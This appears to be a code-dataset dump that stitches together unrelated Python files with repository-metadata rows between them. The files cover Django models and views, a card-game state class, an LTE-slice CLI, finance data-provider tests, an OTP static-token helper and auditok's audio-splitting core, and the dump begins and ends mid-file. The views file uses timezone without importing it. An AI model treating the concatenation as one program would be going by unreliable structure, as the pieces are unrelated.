    f_e3_size = models.IntegerField()
    f_e4_size = models.IntegerField()
    f_e5_size = models.IntegerField()
    f_e6_size = models.IntegerField()
    f_e7_size = models.IntegerField()
    f_e8_size = models.IntegerField()
    #mt_ball.meta
    class Meta:
        ordering = ['f_card_no']
    #mt_ball.methods
    def get_absolute_url(self):
        return reverse('mt_deck', args=[str(self.f_card_no)])
    def __str__(self):
        return str(self.f_card_no)
    def list_elements(self):
        # Convenience accessor: the card's eight symbols in order.
        return [self.f_e1, self.f_e2, self.f_e3, self.f_e4, self.f_e5, self.f_e6, self.f_e7, self.f_e8]
#model:mt_iq
class mt_iq(models.Model):
    """One timing record for a player's move in a game (used for the IQ/
    reaction-time statistics)."""
    #mt_ball.fields
    f_game_name = models.CharField(primary_key=False, max_length=100, default="dgame")
    f_player = models.CharField(max_length=100)
    f_time = models.DateTimeField(default = datetime.now)
    # Play duration in seconds with millisecond precision.
    f_play_time = models.DecimalField(default = 0, max_digits = 10, decimal_places = 3)
    #mt_ball.meta
    class Meta:
        ordering = ['f_game_name']
    #mt_ball.methods
    def get_absolute_url(self):
        return reverse('mt_iq', args=[str(self.id)])
    def __str__(self):
        return self.f_game_name
#model:mt_player
class mt_player(models.Model):
    """Aggregated per-player statistics for the IQ game mode."""
    #mt_ball.fields
    f_player_name = models.CharField(primary_key=False, max_length=100, default="player")
    # Running average and personal-best play times (seconds, ms precision).
    f_g_iq_avg_time = models.DecimalField(default = 0, max_digits = 10, decimal_places = 3)
    f_g_iq_best_time = models.DecimalField(default = 0, max_digits = 10, decimal_places = 3)
    f_g_iq_no_games = models.IntegerField(default = 1)
    #mt_ball.meta
    class Meta:
        ordering = ['f_player_name']
    #mt_ball.methods
    def get_absolute_url(self):
        return reverse('mt_player', args=[str(self.id)])
    def __str__(self):
        return self.f_player_name
| 32.078571 | 97 | 0.764863 |
4600724508364a1d56a810feb294edee747f1b6b | 848 | py | Python | state.py | shreshthtuli/Achieve31 | 966fbd8b40d3a300b92adff6613d1a28bacc3272 | [
"MIT"
] | null | null | null | state.py | shreshthtuli/Achieve31 | 966fbd8b40d3a300b92adff6613d1a28bacc3272 | [
"MIT"
] | null | null | null | state.py | shreshthtuli/Achieve31 | 966fbd8b40d3a300b92adff6613d1a28bacc3272 | [
"MIT"
] | null | null | null | from utils import *
class State:
def __init__(self, dealer, mySum=0):
self.oneTwoThree = [False, False, False]
self.special = 0
self.sum = mySum
self.dealer = dealer
def action(self, card):
# print("Card = ", card)
if card <= 3 and card > 0 and not self.oneTwoThree[card-1]:
self.oneTwoThree[card-1] = True
self.special += 1
self.sum += card
def score(self):
score = self.sum
for i in range(self.special):
if score <= 21:
score += 10
return score
def runDealer(self):
while self.dealer < 25 and self.dealer >= 0:
self.dealer += draw()
def __str__(self):
return str(self.special) + ", " + str(self.sum) + ", " + str(self.score()) + ", " + str(self.dealer)
| 28.266667 | 108 | 0.522406 |
b06a6ffa4ae8f366c04af8241ee5d07488d86502 | 1,585 | py | Python | empower/cli/lteslices_commands/delete_lte_slice.py | ericbrinckhaus/empower-runtime-modified | ecd7c1e9f1c19a629abdcb5c55257377313246ea | [
"Apache-2.0"
] | null | null | null | empower/cli/lteslices_commands/delete_lte_slice.py | ericbrinckhaus/empower-runtime-modified | ecd7c1e9f1c19a629abdcb5c55257377313246ea | [
"Apache-2.0"
] | null | null | null | empower/cli/lteslices_commands/delete_lte_slice.py | ericbrinckhaus/empower-runtime-modified | ecd7c1e9f1c19a629abdcb5c55257377313246ea | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
#
# Copyright (c) 2019 Roberto Riggio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""LTE Slices CLI tools."""
import uuid
import argparse
from empower.cli import command
def pa_cmd(args, cmd):
    """Parse command-line options for the delete-LTE-slice command.

    Returns the (parsed_args, leftover_args) pair from parse_known_args.
    """
    parser = argparse.ArgumentParser(
        usage="%s <options>" % command.USAGE.format(cmd),
        description=command.DESCS[cmd])
    named = parser.add_argument_group('required named arguments')
    named.add_argument('-p', '--project_id', help='The project id',
                       required=True, type=uuid.UUID, dest="project_id")
    named.add_argument('-s', '--slice_id', help='The slice id',
                       required=True, type=int, dest="slice_id")
    parsed, leftovers = parser.parse_known_args(args)
    return parsed, leftovers
def do_cmd(gargs, args, _):
    """Issue the DELETE request for the given LTE slice and echo its id."""
    url = f'/api/v1/projects/{args.project_id}/lte_slices/{args.slice_id}'
    # 204 is the expected "No Content" status for a successful delete.
    command.connect(gargs, ('DELETE', url), 204)
    print(args.slice_id)
| 28.818182 | 75 | 0.682019 |
c4cbb51422a76ecfb5555ef1ebcca4f34a37b1f2 | 2,298 | py | Python | hoods/views.py | badruu/neighborhood | 85d30f7451f921c533dc4463aad76ed2d39f8023 | [
"MIT"
] | null | null | null | hoods/views.py | badruu/neighborhood | 85d30f7451f921c533dc4463aad76ed2d39f8023 | [
"MIT"
] | 6 | 2021-03-19T01:10:18.000Z | 2022-03-11T23:49:18.000Z | hoods/views.py | badruu/neighborhood | 85d30f7451f921c533dc4463aad76ed2d39f8023 | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect
from django.http import HttpResponse, Http404, HttpResponseRedirect
import datetime as dt
from .models import Hoods, Business
from users.models import Profile
from .forms import *
from django.contrib.auth.decorators import login_required
@login_required(login_url="/users/login/")
def index(request):
users = Profile.objects.all()
current_user=request.user
hoods = Hoods.objects.all()
businesses = Business.objects.all()
return render(request, 'hoods/index.html', {"current_user":current_user, "businesses":businesses, "hoods":hoods, "users":users})
@login_required(login_url="/users/login/")
def createneighbourhood(request):
'''
View function for new service page
'''
current_user=request.user
admin=Profile.objects.get(user=current_user)
user = Profile.objects.get(user=current_user)
hoods = user.neighbourhood_id
if request.method == 'POST':
form = NeighbourhoodForm(request.POST, request.FILES)
if form.is_valid():
hoods = form.save(commit=False)
hoods.admin = current_user
hoods.population = 1
hoods.timestamp = timezone.now()
hoods.save()
return redirect('welcome')
else:
form = NeighbourhoodForm()
return render(request, 'hoods/hoodform.html', {"form":form, "current_user":current_user, "admin":admin, "user":user, "hoods":hoods})
@login_required(login_url="/users/login/")
def createbusiness(request):
'''
View function for new service page
'''
current_user=request.user
admin=Profile.objects.get(user=current_user)
user = Profile.objects.get(user=current_user)
biznas = user.business_id
hoods = user.neighbourhood_id
if request.method == 'POST':
form = BusinessForm(request.POST, request.FILES)
if form.is_valid():
biznas = form.save(commit=False)
biznas.user = current_user
biznas.hood_id = hoods
biznas.timestamp = timezone.now()
biznas.save()
return redirect('welcome')
else:
form = BusinessForm()
return render(request, 'hoods/businessform.html', {"form":form, "current_user":current_user, "admin":admin, "user":user, "biznas":biznas}) | 35.90625 | 142 | 0.67537 |
6bcaf858720334420cf6a5768c5cfa8cce603e67 | 600 | py | Python | tests/test_cli.py | OpenCorpora/opencorpora-tools | a4064b911347cbb1ded88e108e135186aeeb27e9 | [
"MIT"
] | 3 | 2017-02-24T17:25:28.000Z | 2019-02-27T22:09:54.000Z | tests/test_cli.py | OpenCorpora/opencorpora-tools | a4064b911347cbb1ded88e108e135186aeeb27e9 | [
"MIT"
] | null | null | null | tests/test_cli.py | OpenCorpora/opencorpora-tools | a4064b911347cbb1ded88e108e135186aeeb27e9 | [
"MIT"
] | 1 | 2020-10-18T21:38:21.000Z | 2020-10-18T21:38:21.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import mock
import unittest
import tempfile
from opencorpora import cli
class CliTest(unittest.TestCase):
@mock.patch('opencorpora.cli.urlopen')
def test_download(self, urlopen):
urlopen.return_value.read.return_value = ''
with tempfile.NamedTemporaryFile() as f:
class Args(object):
output = f.name
no_decompress = False
url = ''
disambig = False
quiet = False
args = Args()
cli.download(args)
| 27.272727 | 51 | 0.588333 |
b96acdd4c0d3a9105bc459a96bbde7b13053eb66 | 10,971 | py | Python | test/finance/test_data_providers.py | charmerDark/qiskit-aqua | c1564af8792c6664670807614a378147fd04d28f | [
"Apache-2.0"
] | 83 | 2018-07-25T02:45:48.000Z | 2018-12-15T15:34:14.000Z | test/finance/test_data_providers.py | charmerDark/qiskit-aqua | c1564af8792c6664670807614a378147fd04d28f | [
"Apache-2.0"
] | 84 | 2018-07-24T13:30:37.000Z | 2018-12-14T20:22:23.000Z | test/finance/test_data_providers.py | charmerDark/qiskit-aqua | c1564af8792c6664670807614a378147fd04d28f | [
"Apache-2.0"
] | 42 | 2018-07-26T01:53:13.000Z | 2018-12-07T16:30:19.000Z | # This code is part of Qiskit.
#
# (C) Copyright IBM 2019, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test Data Providers """
import unittest
import os
import datetime
from test.finance import QiskitFinanceTestCase
import warnings
from ddt import ddt, data, unpack
import numpy as np
from qiskit.aqua import MissingOptionalLibraryError
from qiskit.finance import QiskitFinanceError
from qiskit.finance.data_providers import (RandomDataProvider,
WikipediaDataProvider,
YahooDataProvider,
StockMarket,
DataOnDemandProvider,
ExchangeDataProvider)
# This can be run as python -m unittest test.test_data_providers.TestDataProviders
@ddt
class TestDataProviders(QiskitFinanceTestCase):
"""Tests data providers for the Portfolio Optimization and Diversification."""
def setUp(self):
super().setUp()
warnings.filterwarnings(action="ignore", message="unclosed", category=ResourceWarning)
self._quandl_token = os.getenv('QUANDL_TOKEN') if os.getenv('QUANDL_TOKEN') else ''
self._on_demand_token = os.getenv('ON_DEMAND_TOKEN') if os.getenv('ON_DEMAND_TOKEN') else ''
    def tearDown(self):
        """Restore the default ResourceWarning behaviour silenced in setUp."""
        super().tearDown()
        warnings.filterwarnings(action="always", message="unclosed", category=ResourceWarning)
    def test_random_wrong_use(self):
        """Matrix getters called before .run() must raise QiskitFinanceError."""
        try:
            rnd = RandomDataProvider(seed=1)
            # Now, the .run() method is expected, which does the actual data loading
            # (and can take seconds or minutes,
            # depending on the data volumes, hence not ok in the constructor)
            with self.subTest('test RandomDataProvider get_covariance_matrix'):
                self.assertRaises(QiskitFinanceError, rnd.get_covariance_matrix)
            with self.subTest('test RandomDataProvider get_similarity_matrix'):
                self.assertRaises(QiskitFinanceError, rnd.get_similarity_matrix)
            wiki = WikipediaDataProvider(
                token=self._quandl_token,
                tickers=["GOOG", "AAPL"],
                start=datetime.datetime(2016, 1, 1),
                end=datetime.datetime(2016, 1, 30)
            )
            # Now, the .run() method is expected, which does the actual data loading
            with self.subTest('test WikipediaDataProvider get_covariance_matrix'):
                self.assertRaises(QiskitFinanceError, wiki.get_covariance_matrix)
            with self.subTest('test WikipediaDataProvider get_similarity_matrix'):
                self.assertRaises(QiskitFinanceError, wiki.get_similarity_matrix)
        except MissingOptionalLibraryError as ex:
            # Optional finance dependencies may be absent in CI: skip, not fail.
            self.skipTest(str(ex))
def test_yahoo_wrong_use(self):
""" Yahoo! wrong use test """
try:
yahoo = YahooDataProvider(
tickers=["AEO", "ABBY"],
start=datetime.datetime(2018, 1, 1),
end=datetime.datetime(2018, 12, 31)
)
# Now, the .run() method is expected, which does the actual data loading
with self.subTest('test YahooDataProvider get_covariance_matrix'):
self.assertRaises(QiskitFinanceError, yahoo.get_covariance_matrix)
with self.subTest('test YahooDataProvider get_similarity_matrix'):
self.assertRaises(QiskitFinanceError, yahoo.get_similarity_matrix)
except MissingOptionalLibraryError as ex:
self.skipTest(str(ex))
def test_random(self):
""" random test """
similarity = np.array([[1.00000000e+00, 6.2284804e-04], [6.2284804e-04, 1.00000000e+00]])
covariance = np.array([[2.08413157, 0.20842107], [0.20842107, 1.99542187]])
try:
rnd = RandomDataProvider(seed=1)
rnd.run()
with self.subTest('test RandomDataProvider get_covariance_matrix'):
np.testing.assert_array_almost_equal(rnd.get_covariance_matrix(),
covariance, decimal=3)
with self.subTest('test RandomDataProvider get_similarity_matrix'):
np.testing.assert_array_almost_equal(rnd.get_similarity_matrix(),
similarity, decimal=3)
except MissingOptionalLibraryError as ex:
self.skipTest(str(ex))
def test_random_divide_0(self):
""" Random divide by 0 test """
# This will create data with some 0 values, it should not throw
# divide by 0 errors
try:
seed = 8888
num_assets = 4
stocks = [("TICKER%s" % i) for i in range(num_assets)]
random_data = RandomDataProvider(
tickers=stocks,
start=datetime.datetime(2016, 1, 1),
end=datetime.datetime(2016, 1, 30),
seed=seed,
)
random_data.run()
mu_value = random_data.get_period_return_mean_vector()
sigma_value = random_data.get_period_return_covariance_matrix()
with self.subTest("test get_period_return_mean_vector is numpy array"):
self.assertIsInstance(mu_value, np.ndarray)
with self.subTest("test get_period_return_covariance_matrix is numpy array"):
self.assertIsInstance(sigma_value, np.ndarray)
except MissingOptionalLibraryError as ex:
self.skipTest(str(ex))
def test_wikipedia(self):
""" wikipedia test """
try:
wiki = WikipediaDataProvider(
token=self._quandl_token,
tickers=["GOOG", "AAPL"],
start=datetime.datetime(2016, 1, 1),
end=datetime.datetime(2016, 1, 30)
)
wiki.run()
similarity = np.array([
[1.00000000e+00, 8.44268222e-05],
[8.44268222e-05, 1.00000000e+00]
])
covariance = np.array([
[269.60118129, 25.42252332],
[25.42252332, 7.86304499]
])
with self.subTest('test WikipediaDataProvider get_covariance_matrix'):
np.testing.assert_array_almost_equal(wiki.get_covariance_matrix(),
covariance, decimal=3)
with self.subTest('test WikipediaDataProvider get_similarity_matrix'):
np.testing.assert_array_almost_equal(wiki.get_similarity_matrix(),
similarity, decimal=3)
except MissingOptionalLibraryError as ex:
self.skipTest(str(ex))
except QiskitFinanceError as ex:
self.skipTest("Test of WikipediaDataProvider skipped: {}".format(str(ex)))
# The trouble for automating testing is that after 50 tries
# from one IP address within a day
# Quandl complains about the free usage tier limits:
# quandl.errors.quandl_error.LimitExceededError: (Status 429) (Quandl Error QELx01)
# You have exceeded the anonymous user limit of 50 calls per day. To make more calls
# today, please register for a free Quandl account and then include your API
# key with your requests.
# This gets "dressed" as QiskitFinanceError.
# This also introduces a couple of seconds of a delay.
def test_nasdaq(self):
""" nasdaq test """
try:
nasdaq = DataOnDemandProvider(
token=self._on_demand_token,
tickers=["GOOG", "AAPL"],
start=datetime.datetime(2016, 1, 1),
end=datetime.datetime(2016, 1, 2)
)
nasdaq.run()
except QiskitFinanceError as ex:
self.skipTest("Test of DataOnDemandProvider skipped {}".format(str(ex)))
def test_exchangedata(self):
""" exchange data test """
try:
lse = ExchangeDataProvider(
token=self._quandl_token,
tickers=["AEO", "ABBY"],
stockmarket=StockMarket.LONDON,
start=datetime.datetime(2018, 1, 1),
end=datetime.datetime(2018, 12, 31)
)
lse.run()
similarity = np.array([
[1.00000000e+00, 8.44268222e-05],
[8.44268222e-05, 1.00000000e+00]
])
covariance = np.array(
[[2.693, -18.65],
[-18.65, 1304.422]])
with self.subTest('test ExchangeDataProvider get_covariance_matrix'):
np.testing.assert_array_almost_equal(lse.get_covariance_matrix(),
covariance, decimal=3)
with self.subTest('test ExchangeDataProvider get_similarity_matrix'):
np.testing.assert_array_almost_equal(lse.get_similarity_matrix(),
similarity, decimal=3)
except MissingOptionalLibraryError as ex:
self.skipTest(str(ex))
except QiskitFinanceError as ex:
self.skipTest("Test of ExchangeDataProvider skipped {}".format(str(ex)))
@data(
[["AEO", "AEP"], [[7.0, 1.0], [1.0, 15.0]], [[1.0e00, 9.2e-05], [9.2e-05, 1.0e00]]],
["AEO", 7.0, [[1.0]]],
)
@unpack
def test_yahoo(self, tickers, covariance, similarity):
""" Yahoo data test """
try:
yahoo = YahooDataProvider(
tickers=tickers,
start=datetime.datetime(2018, 1, 1),
end=datetime.datetime(2018, 12, 31),
)
yahoo.run()
with self.subTest("test YahooDataProvider get_covariance_matrix"):
np.testing.assert_array_almost_equal(
yahoo.get_covariance_matrix(), np.array(covariance), decimal=0
)
with self.subTest("test YahooDataProvider get_similarity_matrix"):
np.testing.assert_array_almost_equal(
yahoo.get_similarity_matrix(), np.array(similarity), decimal=1
)
except MissingOptionalLibraryError as ex:
self.skipTest(str(ex))
except QiskitFinanceError as ex:
self.skipTest("Test of YahooDataProvider skipped {}".format(str(ex)))
# Allow running this test module directly (see module comment above for the
# python -m unittest invocation).
if __name__ == '__main__':
    unittest.main()
| 45.903766 | 100 | 0.591286 |
7cf0b4ccfab00fe4f6789c04ff855ff4d0b22f78 | 532 | py | Python | deformetrica/core/observations/__init__.py | coolteemf/coolteemf-deformetrica | f965d6ecc0d04f243e487468a9dafe9fe864eed2 | [
"MIT"
] | 2 | 2022-03-04T11:19:30.000Z | 2022-03-08T04:47:22.000Z | deformetrica/core/observations/__init__.py | lepennec/Deformetrica_multiscale | dbcb69962dd02f14dde5d63a9abc1de69112f273 | [
"MIT"
] | null | null | null | deformetrica/core/observations/__init__.py | lepennec/Deformetrica_multiscale | dbcb69962dd02f14dde5d63a9abc1de69112f273 | [
"MIT"
] | 1 | 2022-03-07T09:52:52.000Z | 2022-03-07T09:52:52.000Z |
# dataset
from .datasets.longitudinal_dataset import LongitudinalDataset
# landmarks
from .deformable_objects.landmarks.landmark import Landmark
from .deformable_objects.landmarks.point_cloud import PointCloud
from .deformable_objects.landmarks.poly_line import PolyLine
from .deformable_objects.landmarks.surface_mesh import SurfaceMesh
# deformable objects
from .deformable_objects.deformable_multi_object import DeformableMultiObject
from .deformable_objects.image import Image
# from .deformable_objects.scalar import Scalar
| 35.466667 | 77 | 0.87406 |
e0a1ab755643a07eb5778ec7df6803ed4f9bed98 | 689 | py | Python | src/django_otp/plugins/otp_static/lib.py | jaap3/django-otp | d7980bf516018319158570cc75353c905375a3ab | [
"BSD-2-Clause"
] | 318 | 2019-08-27T15:57:05.000Z | 2022-03-30T08:38:29.000Z | src/django_otp/plugins/otp_static/lib.py | jaap3/django-otp | d7980bf516018319158570cc75353c905375a3ab | [
"BSD-2-Clause"
] | 77 | 2019-09-17T11:48:38.000Z | 2022-03-13T17:26:56.000Z | src/django_otp/plugins/otp_static/lib.py | jaap3/django-otp | d7980bf516018319158570cc75353c905375a3ab | [
"BSD-2-Clause"
] | 76 | 2019-08-30T20:29:40.000Z | 2022-03-30T09:14:36.000Z | from django.contrib.auth import get_user_model
from .models import StaticDevice, StaticToken
def add_static_token(username, token=None):
    """Attach a static OTP token to the user identified by ``username``.

    Backs the management command of the same name. The user's first
    :class:`StaticDevice` is reused when one exists; otherwise a device named
    'Backup Code' is created. When ``token`` is None a random token is
    generated.

    Returns the created :class:`StaticToken`.
    """
    owner = get_user_model().objects.get_by_natural_key(username)
    # Reuse the user's first static device, if any.
    device = next(StaticDevice.objects.filter(user=owner).iterator(), None)
    if device is None:
        device = StaticDevice.objects.create(user=owner, name='Backup Code')
    if token is None:
        token = StaticToken.random_token()
    return device.token_set.create(token=token)
| 28.708333 | 76 | 0.728592 |
795cdd96ffb7ec24409923999a5e32771fed4d26 | 52,902 | py | Python | auditok/core.py | phrase-loop-player/auditok | 7f08e14d482d624edb1498867400862f9d881ecf | [
"MIT"
] | null | null | null | auditok/core.py | phrase-loop-player/auditok | 7f08e14d482d624edb1498867400862f9d881ecf | [
"MIT"
] | null | null | null | auditok/core.py | phrase-loop-player/auditok | 7f08e14d482d624edb1498867400862f9d881ecf | [
"MIT"
] | null | null | null | """
.. autosummary::
:toctree: generated/
load
split
AudioRegion
StreamTokenizer
"""
import os
import math
from .util import AudioReader, DataValidator, AudioEnergyValidator
from .io import check_audio_data, to_file, player_for, get_audio_source
from .exceptions import TooSamllBlockDuration
try:
from . import signal_numpy as signal
except ImportError:
from . import signal
__all__ = ["load", "split", "AudioRegion", "StreamTokenizer"]
# Default analysis window (seconds) used by `split` when none is given.
DEFAULT_ANALYSIS_WINDOW = 0.05
# Default log-energy threshold for the AudioEnergyValidator built by `split`.
DEFAULT_ENERGY_THRESHOLD = 50
# Tiny value added before flooring to counter float rounding
# (e.g., 0.3 / 0.1 == 2.9999999999999996); see _duration_to_nb_windows.
_EPSILON = 1e-10
def load(input, skip=0, max_read=None, **kwargs):
    """Load audio data from a source and return it as an :class:`AudioRegion`.

    Parameters
    ----------
    input : None, str, bytes, AudioSource
        source to read audio data from. If `str`, it should be a path to a
        valid audio file. If `bytes`, it is used as raw audio data. If it is
        "-", raw data will be read from stdin. If None, read audio data from
        the microphone using PyAudio. If of type `bytes` or is a path to a
        raw audio file then `sampling_rate`, `sample_width` and `channels`
        parameters (or their alias) are required. If it's an
        :class:`AudioSource` object it's used directly to read data.
    skip : float, default: 0
        amount, in seconds, of audio data to skip from source. If read from
        a microphone, `skip` must be 0, otherwise a `ValueError` is raised.
    max_read : float, default: None
        amount, in seconds, of audio data to read from source. If read from
        microphone, `max_read` should not be None, otherwise a `ValueError` is
        raised.
    audio_format, fmt : str
        type of audio data (e.g., wav, ogg, flac, raw, etc.). This will only
        be used if `input` is a string path to an audio file. If not given,
        audio type will be guessed from file name extension or from file
        header.
    sampling_rate, sr : int
        sampling rate of audio data. Required if `input` is a raw audio file,
        a `bytes` object or None (i.e., read from microphone).
    sample_width, sw : int
        number of bytes used to encode one audio sample, typically 1, 2 or 4.
        Required for raw data, see `sampling_rate`.
    channels, ch : int
        number of channels of audio data. Required for raw data, see
        `sampling_rate`.
    large_file : bool, default: False
        If True, AND if `input` is a path to a *wav* of a *raw* audio file
        (and **only** these two formats) then audio file is not fully loaded to
        memory in order to create the region (but the portion of data needed to
        create the region is of course loaded to memory). Set to True if
        `max_read` is significantly smaller then the size of a large audio file
        that shouldn't be entirely loaded to memory.

    Returns
    -------
    region: AudioRegion

    Raises
    ------
    ValueError
        raised if `input` is None (i.e., read data from microphone) and `skip`
        != 0 or `input` is None `max_read` is None (meaning that when reading
        from the microphone, no data should be skipped, and maximum amount of
        data to read should be explicitly provided).
    """
    # Thin module-level convenience wrapper: all the work (argument
    # validation, online/offline reading) happens in AudioRegion.load.
    return AudioRegion.load(input, skip, max_read, **kwargs)
def split(
    input,
    min_dur=0.2,
    max_dur=5,
    max_silence=0.3,
    drop_trailing_silence=False,
    strict_min_dur=False,
    **kwargs
):
    """
    Split audio data and return a generator of AudioRegions

    Parameters
    ----------
    input : str, bytes, AudioSource, AudioReader, AudioRegion or None
        input audio data. If str, it should be a path to an existing audio
        file. "-" is interpreted as standard input. If bytes, input is
        considered as raw audio data. If None, read audio from microphone.
        Every object that is not an `AudioReader` will be transformed into an
        `AudioReader` before processing. If it is an `str` that refers to a
        raw audio file, `bytes` or None, audio parameters should be provided
        using kwargs (i.e., `samplig_rate`, `sample_width` and `channels` or
        their alias).
        If `input` is str then audio format will be guessed from file
        extension. `audio_format` (alias `fmt`) kwarg can also be given to
        specify audio format explicitly. If none of these options is
        available, rely on backend (currently only pydub is supported) to
        load data.
    min_dur : float, default: 0.2
        minimun duration in seconds of a detected audio event. By using large
        values for `min_dur`, very short audio events (e.g., very short 1-word
        utterances like 'yes' or 'no') can be mis detected. Using very short
        values might result in a high number of short, unuseful audio events.
    max_dur : float, default: 5
        maximum duration in seconds of a detected audio event. If an audio
        event lasts more than `max_dur` it will be truncated. If the
        continuation of a truncated audio event is shorter than `min_dur`
        then this continuation is accepted as a valid audio event if
        `strict_min_dur` is False. Otherwise it is rejected.
    max_silence : float, default: 0.3
        maximum duration of continuous silence within an audio event. There
        might be many silent gaps of this duration within one audio event. If
        the continuous silence happens at the end of the event than it's kept
        as part of the event if `drop_trailing_silence` is False (default).
    drop_trailing_silence : bool, default: False
        Whether to remove trailing silence from detected events. To avoid
        abrupt cuts in speech, trailing silence should be kept, therefore
        this parameter should be False.
    strict_min_dur : bool, default: False
        strict minimum duration. Do not accept an audio event if it is
        shorter than `min_dur` even if it is contiguous to the latest valid
        event. This happens if the the latest detected event had reached
        `max_dur`.

    Other Parameters
    ----------------
    analysis_window, aw : float, default: 0.05 (50 ms)
        duration of analysis window in seconds. A value between 0.01 (10 ms)
        and 0.1 (100 ms) should be good for most use-cases.
    audio_format, fmt : str
        type of audio data (e.g., wav, ogg, flac, raw, etc.). This will only
        be used if `input` is a string path to an audio file. If not given,
        audio type will be guessed from file name extension or from file
        header.
    sampling_rate, sr : int
        sampling rate of audio data. Required if `input` is a raw audio file,
        is a bytes object or None (i.e., read from microphone).
    sample_width, sw : int
        number of bytes used to encode one audio sample, typically 1, 2 or 4.
        Required for raw data, see `sampling_rate`.
    channels, ch : int
        number of channels of audio data. Required for raw data, see
        `sampling_rate`.
    use_channel, uc : {None, "mix"} or int
        which channel to use for split if `input` has multiple audio
        channels. Regardless of which channel is used for splitting, returned
        audio events contain data from *all* channels, just as `input`.
        The following values are accepted:

        - None (alias "any"): accept audio activity from any channel, even if
          other channels are silent. This is the default behavior.
        - "mix" ("avg" or "average"): mix down all channels (i.e. compute
          average channel) and split the resulting channel.
        - int (0 <=, > `channels`): use one channel, specified by integer id,
          for split.
    large_file : bool, default: False
        If True, AND if `input` is a path to a *wav* of a *raw* audio file
        (and only these two formats) then audio data is lazily loaded to
        memory (i.e., one analysis window a time). Otherwise the whole file
        is loaded to memory before split. Set to True if the size of the file
        is larger than available memory.
    max_read, mr : float, default: None, read until end of stream
        maximum data to read from source in seconds.
    validator, val : callable, DataValidator
        custom data validator. If `None` (default), an `AudioEnergyValidor`
        is used with the given energy threshold. Can be a callable or an
        instance of `DataValidator` that implements `is_valid`. In either
        case, it'll be called with with a window of audio data as the first
        parameter.
    energy_threshold, eth : float, default: 50
        energy threshold for audio activity detection. Audio regions that
        have enough windows of with a signal energy equal to or above this
        threshold are considered valid audio events. Here we are referring to
        this amount as the energy of the signal but to be more accurate, it
        is the log energy of computed as:
        `20 * log10(sqrt(dot(x, x) / len(x)))` (see
        :class:`AudioEnergyValidator` and
        :func:`calculate_energy_single_channel`). If `validator` is given,
        this argument is ignored.

    Yields
    ------
    AudioRegion
        a generator of detected :class:`AudioRegion` s.
    """
    if min_dur <= 0:
        raise ValueError("'min_dur' ({}) must be > 0".format(min_dur))
    if max_dur <= 0:
        raise ValueError("'max_dur' ({}) must be > 0".format(max_dur))
    if max_silence < 0:
        raise ValueError("'max_silence' ({}) must be >= 0".format(max_silence))
    if isinstance(input, AudioReader):
        source = input
        analysis_window = source.block_dur
    else:
        analysis_window = kwargs.get(
            "analysis_window", kwargs.get("aw", DEFAULT_ANALYSIS_WINDOW)
        )
        if analysis_window <= 0:
            raise ValueError(
                "'analysis_window' ({}) must be > 0".format(analysis_window)
            )
        params = kwargs.copy()
        params["max_read"] = params.get("max_read", params.get("mr"))
        params["audio_format"] = params.get("audio_format", params.get("fmt"))
        if isinstance(input, AudioRegion):
            # An AudioRegion carries its own audio parameters; re-wrap its
            # raw data so it can be re-split with a (possibly) different
            # analysis window.
            params["sampling_rate"] = input.sr
            params["sample_width"] = input.sw
            params["channels"] = input.ch
            input = bytes(input)
        try:
            source = AudioReader(input, block_dur=analysis_window, **params)
        except TooSamllBlockDuration as exc:
            err_msg = "Too small 'analysis_windows' ({0}) for sampling rate "
            err_msg += "({1}). Analysis windows should at least be 1/{1} to "
            err_msg += "cover one single data sample"
            # Chain the original exception so the root cause stays visible
            # in the traceback (PEP 3134).
            raise ValueError(
                err_msg.format(exc.block_dur, exc.sampling_rate)
            ) from exc
    validator = kwargs.get("validator", kwargs.get("val"))
    if validator is None:
        energy_threshold = kwargs.get(
            "energy_threshold", kwargs.get("eth", DEFAULT_ENERGY_THRESHOLD)
        )
        use_channel = kwargs.get("use_channel", kwargs.get("uc"))
        validator = AudioEnergyValidator(
            energy_threshold, source.sw, source.ch, use_channel=use_channel
        )
    mode = StreamTokenizer.DROP_TRAILING_SILENCE if drop_trailing_silence else 0
    if strict_min_dur:
        mode |= StreamTokenizer.STRICT_MIN_LENGTH
    # Convert second-based parameters to numbers of analysis windows;
    # _EPSILON counters float rounding before flooring.
    min_length = _duration_to_nb_windows(min_dur, analysis_window, math.ceil)
    max_length = _duration_to_nb_windows(
        max_dur, analysis_window, math.floor, _EPSILON
    )
    max_continuous_silence = _duration_to_nb_windows(
        max_silence, analysis_window, math.floor, _EPSILON
    )
    err_msg = "({0} sec.) results in {1} analysis window(s) "
    err_msg += "({1} == {6}({0} / {2})) which is {5} the number "
    err_msg += "of analysis window(s) for 'max_dur' ({3} == floor({4} / {2}))"
    if min_length > max_length:
        err_msg = "'min_dur' " + err_msg
        raise ValueError(
            err_msg.format(
                min_dur,
                min_length,
                analysis_window,
                max_length,
                max_dur,
                "higher than",
                "ceil",
            )
        )
    if max_continuous_silence >= max_length:
        err_msg = "'max_silence' " + err_msg
        raise ValueError(
            err_msg.format(
                max_silence,
                max_continuous_silence,
                analysis_window,
                max_length,
                max_dur,
                "higher or equal to",
                "floor",
            )
        )
    tokenizer = StreamTokenizer(
        validator, min_length, max_length, max_continuous_silence, mode=mode
    )
    source.open()
    token_gen = tokenizer.tokenize(source, generator=True)
    region_gen = (
        _make_audio_region_meta(
            token[0],
            token[1],
            source.block_dur,
            source.sr,
            source.sw,
            source.ch,
        )
        for token in token_gen
    )
    return region_gen
def _duration_to_nb_windows(
duration, analysis_window, round_fn=round, epsilon=0
):
"""
Converts a given duration into a positive integer of analysis windows.
if `duration / analysis_window` is not an integer, the result will be
rounded to the closest bigger integer. If `duration == 0`, returns `0`.
If `duration < analysis_window`, returns 1.
`duration` and `analysis_window` can be in seconds or milliseconds but
must be in the same unit.
Parameters
----------
duration : float
a given duration in seconds or ms.
analysis_window: float
